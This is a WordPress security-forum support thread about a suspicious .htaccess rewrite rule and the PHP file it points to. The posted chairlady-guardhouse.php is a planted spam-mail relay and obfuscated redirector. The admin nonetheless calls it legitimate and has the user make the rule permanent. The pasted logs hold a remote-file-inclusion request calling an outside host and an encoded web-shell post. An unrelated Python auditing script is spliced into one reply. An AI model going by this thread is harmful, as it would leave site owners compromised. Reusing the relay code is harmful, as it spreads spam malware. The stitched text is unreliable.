chairlady-guardhouse.php htaccess RewriteRule


This topic contains 10 replies, has 2 voices, and was last updated by holbrook 1 year, 8 months ago.

    #31135

    holbrook
    Participant

    Hello,

    This code is in my .htaccess file at the top (I have BPS):

    RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L]

    This code has been there since October 8, 2016 (server file date). Is it something to be concerned about? The only thing I recall doing is creating a couple of new users.

    Thank you.

    #31136

    AITpro Admin
    Keymaster

    The RewriteRule says to rewrite this URI: 0608630493 to this URI: chairlady-guardhouse.php. Do you recognize this file: chairlady-guardhouse.php? Are you using any plugins that create htaccess code?
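    To make the rewrite described above concrete, and to show how an administrator can audit an .htaccess for rules of this kind mechanically, here is an added example (not code from the thread or from the BPS plugin). It parses RewriteRule lines from a constructed .htaccess that contains the rule quoted in the thread, flags rules whose target is a PHP file outside a small allow-list, and applies a flagged rule to a request URI the way Apache's per-directory rewriting would; the allow-list and the sample .htaccess are assumptions.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample: a BPS-style root .htaccess holding the rule quoted in the thread.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L]
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

# Assumed allow-list: WordPress front controllers a rule may legitimately target.
# Any other PHP file sitting beside .htaccess in the web root deserves a look.
KNOWN_TARGETS = {"index.php", "wp-login.php", "xmlrpc.php"}

RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)

Rule = Tuple[str, str, List[str]]  # (pattern, target, flags)


def parse_rewrite_rules(htaccess: str) -> List[Rule]:
    """Return (pattern, target, flags) for every RewriteRule directive."""
    rules = []
    for line in htaccess.splitlines():
        m = RULE_RE.match(line)
        if m:
            flags = [f.strip() for f in m.group(3).split(",")] if m.group(3) else []
            rules.append((m.group(1), m.group(2), flags))
    return rules


def suspicious_rules(htaccess: str) -> List[Rule]:
    """Flag rules that route requests to a PHP file outside the allow-list."""
    flagged = []
    for rule in parse_rewrite_rules(htaccess):
        name = rule[1].lstrip("/").split("?")[0]
        if name.lower().endswith(".php") and name not in KNOWN_TARGETS:
            flagged.append(rule)
    return flagged


def rewrite(rule: Rule, request_uri: str) -> Optional[str]:
    """Apply one per-directory RewriteRule: match the path without its leading slash,
    substitute $N back-references (Python uses \\N), honour QSA for the query string."""
    pattern, target, flags = rule
    path, _, query = request_uri.partition("?")
    m = re.match(pattern, path.lstrip("/"))
    if not m:
        return None
    new_path = m.expand(re.sub(r"\$(\d)", r"\\\1", target))
    return new_path + ("?" + query if "QSA" in flags and query else "")
```

Running `suspicious_rules(SAMPLE_HTACCESS)` on the sample flags only the chairlady-guardhouse.php rule; the WordPress permalink rule targeting /index.php is left alone.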

    #31139

    holbrook
    Participant

    I don’t know of any plugins that I have that create htaccess code. Plugins that I use:

    Akismet, BPS, Jetpack, Simple Google Map, Simple Google Sitemap, Weaver II Maintenance, Weaver II Theme Extras. I will continue looking to see if any of these create htaccess code.

    I don’t find in the Log that a plugin was blocked on the day (10/8/2016 10:31 am) this file (chairlady-guardhouse.php) was created. Here are the log entries for that date:

    
    [403 GET Request: October 8, 2016 6:14 am]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 54.200.203.227
    Host Name: ec2-54-200-203-227.us-west-2.compute.amazonaws.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com
    REQUEST_URI: /wp-login.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
    
    [403 POST Request: October 8, 2016 2:31 pm]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 195.154.77.147
    Host Name: 195-154-77-147.rev.poneytelecom.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-includes/theme-compat/footer_ver1.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
    REQUEST BODY: --------------------------b28b44e5c0efe2ab
    Content-Disposition: form-data; name="vdpgjkkp"
    
    ==QZjh2bgIyRP90Ti4iIPRUIisTDKUGepR3O
    --------------------------b28b44e5c0efe2ab--
    [403 GET Request: October 8, 2016 3:44 pm]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 52.43.107.138
    Host Name: ec2-52-43-107-138.us-west-2.compute.amazonaws.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com
    REQUEST_URI: /wp-login.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
    
    [403 GET Request: October 8, 2016 6:22 pm]
    Event Code: PSBR-HPR
    Solution: http://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 178.162.205.5
    Host Name: 178.162.205.5
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-mobile-detector/resize.php?src=http://1268vip.com/wp-content/plugins/juna-it-poll/db.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32
    
    [403 GET Request: October 8, 2016 8:31 pm]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 54.234.145.122
    Host Name: ec2-54-234-145-122.compute-1.amazonaws.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com
    REQUEST_URI: /wp-login.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
    
    

    Here are the contents of the chairlady-guardhouse.php file:

    <?php
    function base64_url_decode($val) {
        return base64_decode(strtr($val, '-_,', '+/='));
    }
    if(isset($_POST) and count($_POST) > 0){
    	if(isset($_POST["chk"])){
    	    $val = array();
    	    $val["res"] = 1;
    	    print json_encode($val);
    	}else{
    	    $post_data = array_values(array_map('stripslashes', $_POST));
    	    $m_data = explode("|||", base64_url_decode(strrev($post_data[0])));
    	    if(count($m_data) > 1){
    		    $val = array();
    		    if(mail($m_data[0], $m_data[1], $m_data[2], $m_data[3])){
    		        $val["mail"] = 1;
    		    } else{
    		        $val["mail"] = 0;
    		    }
    		    print json_encode($val);
    	    }
        }
    }
    
    if(isset($_GET) and count($_GET) > 0){
        $url = "";
        $redic = array_values($_GET);
        foreach(str_split(base64_url_decode($redic[0])) as $letter){
                if(rand(1,3) == 1){
                        $url .= $letter;
                }else{
                        $url .= $letter."'+'";
                }
        }
    ?>
    <html><head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8">
    <title>Redirecting</title>
    <script>
    var r = '<?php echo $url;?>';
    var _0x485b=["\x72\x65\x70\x6C\x61\x63\x65"];
    </script>
    </head>
    <body onload="location[_0x485b[0]](r);">
    Loading...
    </body></html>
    <?php } ?>
    #31140

    AITpro Admin
    Keymaster

    Where did you find the chairlady-guardhouse.php file? The code in general is non-malicious, but it would be good to know the origin to confirm the source.

    #31141

    holbrook
    Participant

    The chairlady-guardhouse.php file is in my public_html folder. My public_html folder contains two WP websites. The chairlady-guardhouse.php file is of the type application/x-httpd-php (shown in my File Manager), and the permissions are 0644. It appears in my file manager right under the .htaccess file.

    #31143

    AITpro Admin
    Keymaster

    The file and htaccess code appear to be legitimate. So add your htaccess code to this Root Custom Code text box: CUSTOM CODE BOTTOM HOTLINKING/FORBID COMMENT SPAMMERS/BLOCK BOTS/BLOCK IP/REDIRECT CODE, click the Save Root Custom Code button and activate Root folder BulletProof mode.

    #31147

    holbrook
    Participant

    So, I copy everything that is presently in my htaccess file and then paste it into the text box that you specified, is that right? I do this for both of my sites?

    Could you give me a little explanation to help me make sense of what I’m doing here?

    Am I copying the htaccess code from the htaccess file in the BulletProof Security Plugin or from the htaccess code on my server? If it is the one in BPS, which one do I use (secure.htaccess, default.htaccess, etc.)?

    The htaccess file contents that I gave you a couple days ago was from the htaccess file on my server.

    #31151

    AITpro Admin
    Keymaster

    These are the literal steps to add the htaccess code to BPS Custom Code, which saves the htaccess code permanently so that it will always be saved/written/created in your Root htaccess file any time you click the Root Folder BulletProof Mode activate button:

    1. Copy this htaccess code: RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L] to this BPS Root Custom Code text box: CUSTOM CODE BOTTOM HOTLINKING/FORBID COMMENT SPAMMERS/BLOCK BOTS/BLOCK IP/REDIRECT CODE
    2. Click the Save Root Custom Code button.
    3. Go to the Security Modes tab page and click the Root Folder BulletProof Mode activate button.

    #31152

    holbrook
    Participant

    Ok, thank you. Do I then need to delete “RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L]” from my htaccess file that’s on my server?

    #31153

    AITpro Admin
    Keymaster

    Nope, you do not need to do anything manually with that htaccess code in your Root htaccess file. When you copy the htaccess code (or any htaccess code) to Custom Code it is saved permanently. When you click the Root folder BulletProof Mode activate button a new Root htaccess file is created that overwrites your current Root htaccess file. So the end result is that the htaccess code that you saved in BPS Custom Code is and will always be created in your new Root htaccess file.

    #31154

    holbrook
    Participant

    Ok, all finished with that. Thank you very much!
